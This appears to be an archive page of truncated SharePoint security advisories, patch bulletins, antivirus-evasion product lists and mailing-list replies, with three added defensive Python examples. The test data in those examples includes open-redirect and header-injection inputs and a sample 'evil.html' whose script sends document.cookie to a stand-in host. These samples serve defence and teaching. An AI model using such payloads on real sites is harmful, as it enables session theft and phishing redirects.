
Microsoft Sharepoint

Hacktics Advisory Feb10: Persistent XSS in Microsoft SharePoint Portal

===========
I. Overview
===========
During a penetration test performed by Hacktics' experts, a persistent
cross-site scripting vulnerability was identified in the SharePoint document
handling module. This vulnerability allows attackers to gain control over
valid user accounts, perform operations on their behalf, redirect them to
malicious sites, steal their credentials, and more. 

A friendly formatted version of this advisory, including a video

Seeker Advisory Sep11: Insecure Redirect in Microsoft SharePoint Portal

===========
I. Overview
===========
An Insecure Redirect vulnerability has been identified in Microsoft
SharePoint shared infrastructure. This vulnerability allows an attacker
to craft links that contain redirects to malicious sites in the source
parameter used throughout SharePoint portal.

The exploitation technique detailed in this document bypasses the cross
application redirection restriction which normally limits such redirects
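The excerpt above ends before it describes the bypass, so what follows is an added example of the defensive side only, not Seeker's, Hacktics' or Microsoft's code and not a reproduction of the advisory's technique: a validator a portal can apply to a post-action `Source`-style redirect parameter before issuing the redirect. The allowed host `portal.example.internal` and the inputs in the usage block are assumptions made for illustration.

```python
"""Validate a user-supplied post-action redirect target so the portal can only
send the browser back to itself.

Added example (not Seeker/Hacktics/Microsoft code). ALLOWED_HOSTS and the
inputs in the usage block are constructed for illustration.
"""
from urllib.parse import unquote, urlsplit, urlunsplit

# Constructed: the only hosts this deployment may redirect to.
ALLOWED_HOSTS = {"portal.example.internal"}


def safe_redirect_target(source: str, default: str = "/") -> str:
    """Return `source` if it stays on the portal, otherwise `default`.

    Rejects the usual open-redirect disguises: absolute URLs to foreign
    hosts, userinfo tricks (https://portal@evil), protocol-relative //evil,
    backslash variants (/\\evil, \\\\evil, which browsers normalise to
    slashes), non-https schemes such as javascript:, percent-encoded
    slashes, and CR/LF or other control characters.
    """
    if not source:
        return default
    # Decode once so %2F%2Fevil is inspected as //evil, then strip whitespace.
    candidate = unquote(source).strip()
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in candidate):
        return default
    # Browsers treat '\' like '/'; the validator must see the same URL.
    candidate = candidate.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute form: https only, and the *hostname* (not the netloc,
        # which can hide user@host) must be on the allow list.
        if parts.scheme.lower() != "https" or parts.hostname not in ALLOWED_HOSTS:
            return default
        return urlunsplit(("https", parts.netloc.lower(), parts.path or "/", parts.query, ""))
    # Relative form: a single-slash rooted path. '//' and '///' are
    # scheme-relative to a browser even though urlsplit may not say so.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    return urlunsplit(("", "", parts.path, parts.query, ""))


if __name__ == "__main__":
    # Constructed inputs: the first two are legitimate, the rest are attacks.
    for src in ("/sites/team/default.aspx",
                "https://portal.example.internal/sites/x?a=1",
                "//evil.example/", "/\\evil.example", "%2F%2Fevil.example",
                "https://portal.example.internal@evil.example/",
                "javascript:alert(1)", "/x\r\nSet-Cookie: a=b"):
        print(repr(src), "->", safe_redirect_target(src))
```

The fragment is dropped on purpose: a redirect target carries no business state in the fragment, and dropping it removes one more place to hide a payload. Whatever passes this check should still be emitted as a `Location` header by the framework, not interpolated into HTML or script.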

SharePoint 2007 ASP.NET Source Code Disclosure

Published: 23 October 2009

===========
Description
===========
Microsoft SharePoint is a browser-based collaboration and document
management platform. It can be used to host web sites that access shared
workspaces and documents, as well as specialized applications like wikis
and blogs from a browser.

It was found that the download facility of Microsoft SharePoint Team

Seeker Advisory Sep11: Reflected Cross Site Scripting in Microsoft SharePoint Portal

Disclosed By Irene Abezgauz, September 13th, 2011

===========
I. Overview
===========
A Cross Site Scripting vulnerability has been identified in Microsoft SharePoint 2007. This vulnerability allows attackers to gain control over valid user accounts, perform operations on their behalf, redirect them to malicious sites, steal their credentials, and more.

A friendly formatted version of this advisory is available at: http://www.seekersec.com/Advisories/SeekerAdvMS04.html 

=======
II. Details

CAU-2008-0002: Microsoft Windows SharePoint Services Picture Source XSS

Advisory ID:    CAU-2008-0002
Release Date:   04/08/2008
Title:          Microsoft Windows SharePoint Services Picture Source XSS
Application/OS: Microsoft Windows SharePoint Services 2.0 
Topic:          A stored Cross Site Scripting (XSS) attack is possible
                in Microsoft SharePoint Services 2.0 via picture object
                source when adding a picture object to a page.
Vendor Status:  Not Notified
Attributes:     XSS, Web Service, Microsoft Tuesday
Advisory URL:   http://www.caughq.org/advisories/CAU-2008-0002.txt
Author/Email:   OneIdBeagl3 <oneidbeagl3 (at) caughq.org>

[security bulletin] HPSBST02280 SSRT071480 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS07-055 to MS07-060

 -------------------------------------------------
MS Patch - MS07-058 Vulnerability in RPC Could Allow Denial of Service (DoS) (933729)   
Analysis -  Possible security issue exists. Patch will run successfully.
Action -  For SMA v2.1, customers should download patch from Microsoft and install.
 -------------------------------------------------
MS Patch - MS07-059 Vulnerability in Windows SharePoint Services 3.0 and Office SharePoint Server 2007 Could Result in Elevation of Privilege Within the SharePoint Site (942017)    
Analysis -  SMA does not have this component.  Patch will not run successfully.
Action -  Customers should not be concerned with this issue 
 -------------------------------------------------
MS Patch - MS07-060 Vulnerability in Microsoft Word Could Allow Remote Code Execution (942695)    
Analysis -  SMA does not have this component.  Patch will not run successfully.

Re: [WEB SECURITY] countermeasure against attacks through HTML shared files

Hi Adrian,

>It would have been cool to mention Microsoft SharePoint as an example of
>a popular file sharing system that allows persistent XSS through shared
>HTML files. i.e.:

Thanks for pointing this out.  I didn't look at SharePoint, actually.  I did look at many others, and didn't find any that took any explicit precautions against XSS through shared files.  But I thought there was no need to mention any names in the paper.

Francisco


Re: [WEB SECURITY] countermeasure against attacks through HTML shared files

Hi Francisco,

It would have been cool to mention Microsoft SharePoint as an example of
a popular file sharing system that allows persistent XSS through shared
HTML files. i.e.:

https://moss.company.foo/_catalogs/users/Attachments/<userID>/evil.html
https://moss.company.foo/<siteName>/<SectionName>/evil.html

Where 'evil.html' would be a page containing JavaScript. i.e.:

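The thread above concerns a file-sharing site that serves uploaded HTML from its own origin, so the uploaded page's script runs with the site's cookies. The following is an added example of the countermeasure being discussed, written here; it is neither SharePoint's download handler nor code from the thread's participants. The content-type list, the markup markers and the sample uploads are constructed for illustration.

```python
"""Response-header policy for serving user-uploaded files from a shared site.

Added example for the countermeasure discussion above; it is not SharePoint's
download handler nor code from the thread's authors. The type list, the
markup markers and the sample uploads are constructed for illustration.
"""
import mimetypes
import re

# Content types a browser will render as a document and run script from
# (or parse as XML and script in the site's origin). Constructed list.
ACTIVE_TYPES = {
    "text/html", "application/xhtml+xml", "image/svg+xml",
    "text/xml", "application/xml", "text/javascript", "application/javascript",
}
# Byte markers that reveal markup hiding behind an innocent extension.
MARKUP_MARKERS = (b"<html", b"<!doctype", b"<script", b"<svg", b"<?xml")


def looks_like_markup(body: bytes) -> bool:
    """True if the first KiB of `body` contains an HTML/SVG/XML opener."""
    head = body[:1024].lower()
    return any(marker in head for marker in MARKUP_MARKERS)


def disposition_filename(name: str) -> str:
    """ASCII-only, quote- and CR/LF-free name for a Content-Disposition header."""
    base = name.rsplit("/", 1)[-1]
    cleaned = re.sub(r"[^\w.\- ]", "_", base, flags=re.ASCII).strip()
    return cleaned or "download"


def response_headers(filename: str, body: bytes) -> dict:
    """Headers a download endpoint should send for one stored file.

    Anything that is, or looks like, active content is never rendered in the
    site's origin: it is forced to download, typed as opaque bytes, and for
    clients that render it anyway, locked down with a CSP sandbox. Everything
    else is served inline but with MIME sniffing disabled.
    """
    guessed = mimetypes.guess_type(filename)[0] or "application/octet-stream"
    name = disposition_filename(filename)
    headers = {
        "X-Content-Type-Options": "nosniff",   # no sniffing into text/html
        "Cache-Control": "private, no-store",
    }
    if guessed in ACTIVE_TYPES or looks_like_markup(body):
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = 'attachment; filename="%s"' % name
        headers["Content-Security-Policy"] = "sandbox"   # no script, no same-origin
    else:
        headers["Content-Type"] = guessed
        headers["Content-Disposition"] = 'inline; filename="%s"' % name
    return headers


if __name__ == "__main__":
    # Constructed sample uploads: a hostile page, a real image, and markup
    # disguised as an image.
    samples = {
        "evil.html": b"<html><script>location='//evil.example/?c='+document.cookie</script></html>",
        "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        "logo2.png": b"<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>",
    }
    for name, body in samples.items():
        print(name, response_headers(name, body))
```

Headers are the cheap half of the fix. The stronger half is to serve user content from a separate origin (a dedicated download hostname with no session cookies), so that even a file the headers misclassify cannot reach the portal's cookies or DOM.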
XSS in Microsoft SharePoint Server 2007

Vulnerability ID: HTB22350
Reference: http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html
Product: Microsoft SharePoint Server 2007
Vendor: Microsoft Corporation
Vulnerable Version: 12.0.0.6421 and Probably Prior Versions
Vendor Notification: 12 April 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA (http://www.htbridge.ch/) 

[G-SEC 49-2009] McAfee generic PDF detection bypass

- McAfee VirusScan Enterprise Linux
- McAfee VirusScan Enterprise for SAP
- McAfee VirusScan Enterprise for Storage
- McAfee VirusScan Commandline
- Mcafee SecurityShield for Microsoft ISA Server
- Mcafee Security for Microsoft Sharepoint
- Mcafee Security for Email Servers
- McAfee Email Gateway
- McAfee Total Protection for Endpoint
- McAfee Active Virus Defense
- McAfee Active VirusScan

[TZO-18-2009] Mcafee multiple evasions/bypasses (RAR, ZIP)

- McAfee VirusScan Enterprise Linux
- McAfee VirusScan Enterprise for SAP
- McAfee VirusScan Enterprise for Storage
- McAfee VirusScan Commandline
- Mcafee SecurityShield for Microsoft ISA Server
- Mcafee Security for Microsoft Sharepoint
- Mcafee Security for Email Servers
- McAfee Email Gateway
- McAfee Total Protection for Endpoint
- McAfee Active Virus Defense
- McAfee Active VirusScan

Service Pack 3 for Microsoft Sharepoint Services broken

Concerns Windows SharePoint Services 2.0 Service Pack 3 
Knowledge Base (KB) Articles:   KB923643
Date Published: 9/17/2007

Two serious functionality issues after installing this service pack. See the following thread for details:
http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=2173615&SiteID=1

In brief:
i) Pages with customized data view web parts, or data view web parts linked to lists on other sites, are not accessible. The error message is either "access denied" or "Unable to display this Web Part. To troubleshoot the problem, open this Web page in a Windows SharePoint Services-compatible HTML editor such as FrontPage. If the problem persists, contact your Web server administrator."


Errata: [TZO-2009-1] Avira Antivir - RAR - Division by Zero & Null Pointer Dereference

Avira AntiVir Free
Avira AntiVir Premium
Avira Premium Security Suite
Avira AntiVir Professional
Avira AntiVir for KEN! 4
Avira AntiVir SharePoint
Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
Avira AntiVir MailGate
Avira MailGate Suite
Avira AntiVir Exchange
Avira AntiVir MIMEsweeper

[security bulletin] HPSBST02394 SSRT080183 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-070 to MS08-077

 -------------------------------------------------
MS Patch - MS08-076 Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807)
Analysis - Possible security issue exists. Patch will run successfully.
Action - For SMA v2.1, customers should download patch from Microsoft and install.
 ------------------------------------------------- 
MS Patch - MS08-077 Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175)
Analysis - SMA does not have this component. Patch will not run successfully
Action - Customers should not be concerned with this issue.
 -------------------------------------------------

Installation Instructions: (if applicable) 

Addendum :[TZO-09-2009] Avast bypass / evasion (Limited details)

    * avast! 4 Server Edition(impact high, complete bypass)
    * avast! 4 Server Edition Plug-ins
    * avast! 4 Exchange Server Edition (impact high, complete bypass)
    * avast! 4 ISA Server Edition (impact high, complete bypass)
    * avast! 4 SharePoint Server Edition (impact high, complete bypass)
    * avast! 4 SMTP Server Edition (impact high, complete bypass)
    * avast! 4 Lotus Domino Edition (impact high, complete bypass)
    * avast! Distributed Network Manager (impact high, complete bypass)
    * avast! 4 Professional (impact unknown)
    * avast! 4 BART CD (impact unknown)

Re: MS Office 2007: Digital Signature does not protect Meta-Data

> In fact the visual clue you gave for a signed document in Word 2007 
> shows that in the context for those document properties there
> are also attributes like keywords, category and comments
> which are less misleading to the assumption those properties
> could be part of the signed document. So for example users
> of SharePoint Office Server are acquainted with the
> behavior of showing data that is managed and shown on
> server side in that area above the document.

This might be true, but in my opinion, still builds on either the
assumption

Re: Service Pack 3 for Microsoft Sharepoint Services broken

I can hardly find any information about this post, but this is exactly what happened after I installed Service Pack 3.
What is funny about this error (Pages with customized data view web parts or data view web parts linked to lists on other sites are not accessible. Error message either "access denied" or "Unable to display this Web Part. To troubleshoot the problem, open this Web page in a Windows SharePoint Services-compatible HTML editor such as FrontPage. If the problem persists, contact your Web server administrator.") is that it only happens when someone accesses my site from the outside world; as long as you access the site entirely you don't see this error.

I also have a problem with users from my intranet not being able to log in at all.
If I find a fix I'll post it. Good luck.



[TZO-22-2009] Bitdefender generic evasion of heuristics (for PDF)

- Bitdefender Internet Security 2009 
- Bitdefender Total Security 2009 
- Bitdefender Small Office Security 
- Bitdefender for Fileservers 
- Bitdefender for Samba
- Bitdefender for Sharepoint 
- Bitdefender Security for Exchange 
- Bitdefender Security for Mailservers 
- Bitdefender for ISA Servers 
- Bitdefender Client security 


[TZO-2009-1] Avira Antivir - RAR - Division by Zero & Null Pointer Dereference

                Avira Premium Security Suite
                Avira AntiVir Professional
                Avira AntiVir for KEN! 4
                Avira AntiVir & AntiSpam for KEN! 4
                Avira WebProtector for KEN! 4
                Avira AntiVir SharePoint
                Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
                Avira AntiVir MailGate
                Avira MailGate Suite
                Avira AntiVir Exchange
                Avira AntiVir MIMEsweeper

[TZO-28-2009] - Avira Antivir generic RAR,CAB,ZIP

- Avira AntiVir Premium 
- Avira AntiVir Premium Security Suite 
- Avira AntiVir Professional (Desktop)
- Avira AntiVir Server 
- Avira AntiVir Exchange 
- Avira AntiVir SharePoint
- Avira AntiVir ISA Server
- Avira AntiVir MIMEsweeper 
- Avira AntiVir for KEN! 4 
- Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
- Avira AntiVir Professional (Unix) 

AW: MS Office 2007: Digital Signature does not protect Meta-Data

Dear Mr. Poehls,

yes, I can see your point and I agree that there's a risk for an inexperienced user to be spoofed by showing an Author, Time Stamps and State that could have been tampered with after the original owner has signed the document.
But in my opinion, this again emphasizes the need for sufficient knowledge of users about the way applications may change the appearance of signed documents in a way not intended by the author at the time of signing, and that's a question far beyond the considerations concerning the behavior of individual applications like MS Office.

In fact the visual clue you gave for a signed document in Word 2007 shows that in the context for those document properties there are also attributes like keywords, category and comments which are less misleading to the assumption those properties could be part of the signed document. So for example users of SharePoint Office Server are acquainted with the behavior of showing data that is managed and shown on server side in that area above the document. You should also mention that the label on the menu for showing this area reads "Prepare Document for Publishing" which also in my opinion gives a clue that this data is not part of the signed document.

Although I would appreciate if Word 2007 would give more visual clue for the fact that this data isn't part of the signed document, I still believe that this is not a major security issue.

Regards,
H.-D. Naujoks
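The exchange above turns on which parts of a signed Office 2007 document the signature actually covers. As an added example, written here and neither Microsoft's code nor code from either correspondent, the following reads the manifest of an Office Open XML package signature part and lists which package parts the signature references and which it leaves out, core properties (author, dates) included. It checks coverage only; it does not verify digests or the signature value. The package it builds inline is constructed, with placeholder digest and signature values, and its `_xmlsignatures/sig1.xml` follows the OPC signature layout (a `SignedInfo` reference to an `Object` whose `Manifest` names the signed parts with a `?ContentType=` query).

```python
"""List which parts of an Office Open XML package a digital signature covers.

Added example for the signed-metadata discussion above; not Microsoft code.
It only reads the signature's manifest and does not verify digests or the
signature value. build_sample_package() is constructed, with placeholder
digest/signature values, to show the shape of a signed .docx.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

DSIG = "{http://www.w3.org/2000/09/xmldsig#}"


def signed_parts(package: bytes) -> set:
    """Part names (e.g. 'word/document.xml') referenced from the Manifest of
    every signature part under _xmlsignatures/. The '?ContentType=' query
    OPC appends to each reference is stripped; '#...' references point at
    an <Object> inside the signature, not at a package part."""
    covered = set()
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            # origin.sigs is not XML; the signatures themselves are sigN.xml
            if not (name.startswith("_xmlsignatures/") and name.endswith(".xml")):
                continue
            root = ET.fromstring(z.read(name))
            for ref in root.iter(DSIG + "Reference"):
                uri = ref.get("URI", "")
                if uri.startswith("#"):
                    continue
                covered.add(urlsplit(uri).path.lstrip("/"))
    return covered


def unsigned_parts(package: bytes) -> set:
    """Parts the package carries that no signature manifest references.
    The signature parts themselves and [Content_Types].xml (which OPC does
    not sign) are left out of the report."""
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        parts = {n for n in z.namelist() if not n.endswith("/")}
    return {p for p in parts - signed_parts(package)
            if p != "[Content_Types].xml" and not p.startswith("_xmlsignatures/")}


def build_sample_package() -> bytes:
    """Constructed .docx-like package: body and package relationships are in
    the manifest, docProps/core.xml (author, dates, state) is not. Digest and
    signature values are placeholders, not real hashes."""
    sig = """<?xml version="1.0" encoding="UTF-8"?>
<Signature xmlns="http://www.w3.org/2000/09/xmldsig#" Id="idPackageSignature">
  <SignedInfo>
    <CanonicalizationMethod Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
    <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
    <Reference URI="#idPackageObject" Type="http://www.w3.org/2000/09/xmldsig#Object">
      <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
      <DigestValue>PLACEHOLDER</DigestValue>
    </Reference>
  </SignedInfo>
  <SignatureValue>PLACEHOLDER</SignatureValue>
  <Object Id="idPackageObject">
    <Manifest>
      <Reference URI="/word/document.xml?ContentType=application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml">
        <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
        <DigestValue>PLACEHOLDER</DigestValue>
      </Reference>
      <Reference URI="/_rels/.rels?ContentType=application/vnd.openxmlformats-package.relationships+xml">
        <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
        <DigestValue>PLACEHOLDER</DigestValue>
      </Reference>
    </Manifest>
  </Object>
</Signature>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("_rels/.rels", "<Relationships/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("docProps/core.xml", "<coreProperties/>")
        z.writestr("_xmlsignatures/sig1.xml", sig)
    return buf.getvalue()


if __name__ == "__main__":
    pkg = build_sample_package()
    print("signed:  ", sorted(signed_parts(pkg)))
    print("unsigned:", sorted(unsigned_parts(pkg)))
```

Run against a real signed .docx (read the file's bytes and pass them to `unsigned_parts`), the same two calls show whether `docProps/core.xml` is in the manifest, which is the concrete question behind the thread. Anything the report lists can be edited after signing without invalidating the signature, whatever the application then displays above the document.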

[TZO-08-2009] Bitdefender generic bypass/evasion

- Bitdefender Internet Security 2009 (pre update 13/04/2009)
- Bitdefender Total Security 2009 (pre update 13/04/2009)
- Bitdefender Small Office Security (pre update 13/04/2009)
- Bitdefender for Fileservers (pre update 13/04/2009)
- Bitdefender for Samba (pre update 13/04/2009)
- Bitdefender for Sharepoint (pre update 13/04/2009)
- Bitdefender Security for Exchange (pre update 13/04/2009)
- Bitdefender Security for Mailservers (pre update 13/04/2009)
- Bitdefender for ISA Servers (pre update 13/04/2009)
- Bitdefender Client security (pre update 13/04/2009)


[TZO-23-2009] Avira antivir generic evasion of heuristics (for PDF)

- Avira AntiVir Premium 
- Avira AntiVir Premium Security Suite 
- Avira AntiVir Professional (Desktop)
- Avira AntiVir Server 
- Avira AntiVir Exchange 
- Avira AntiVir SharePoint
- Avira AntiVir ISA Server
- Avira AntiVir MIMEsweeper 
- Avira AntiVir for KEN! 4 
- Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
- Avira AntiVir Professional (Unix) 

[G-SEC 47-2009] Symantec generic PDF detection bypass

- Symantec Mail Security for SMTP
- Symantec Brightmail Gateway
- Symantec AntiVirus for Network Attached Storage
- Symantec AntiVirus for Caching
- Symantec AntiVirus for Messaging
- Symantec Protection for SharePoint Servers
- Symantec Protection Suite
- Symantec Scan Engine
- Symantec Client Security
- Symantec Endpoint Protection
- Symantec AntiVirus Corporate Edition

ToorCon X Lineup & Training Seminars Posted & Pre-Registration Ending

Sergey Bratus, Cory Cornelius, Daniel Peebles, & Axel Hansen - Active Fingerprinting of 802.11 APs
Strom Carlson - Why your mother will never care about Linux (a rant)
Stephan Chenette - Ultimate Script Deobfuscation: Browser Hooking versus simulation
Luiz "effffn" Eduardo - a 30,000 feet look at wi-fi, the freezing spot
Adam Cecchetti - Nunchaku: Attack, Defense, and a lot of arm flailing
Dan Griffin - Hacking SharePoint
Zane Lackey & Luis Miras - Mobile Phone Messaging Anti-Forensics
Dan Hubbard - P0wn the Cloud. The good, the bad, and the pugly of Cloud Computing
Tom Stracener - Advanced Cross-Site Scripting Scenarios, Filter Evasion and Browser Exploits
Thomas Ristenpart - Privacy-preserving Location Tracking of Lost or Stolen Devices: Cryptographic Techniques and Replacing  Trusted Third Parties with DHTs
Dean Pierce - Seeds of Contempt

[TZO-13-2009] Avira Antivir generic CAB evasion / bypass

- Avira AntiVir Premium (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir Premium Security Suite (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir Professional (Desktop) (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir Server (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir Exchange (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir SharePoint (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir ISA Server (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir MIMEsweeper (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir for KEN! 4 (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
- Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
- Avira AntiVir Professional (Unix) (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)



Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
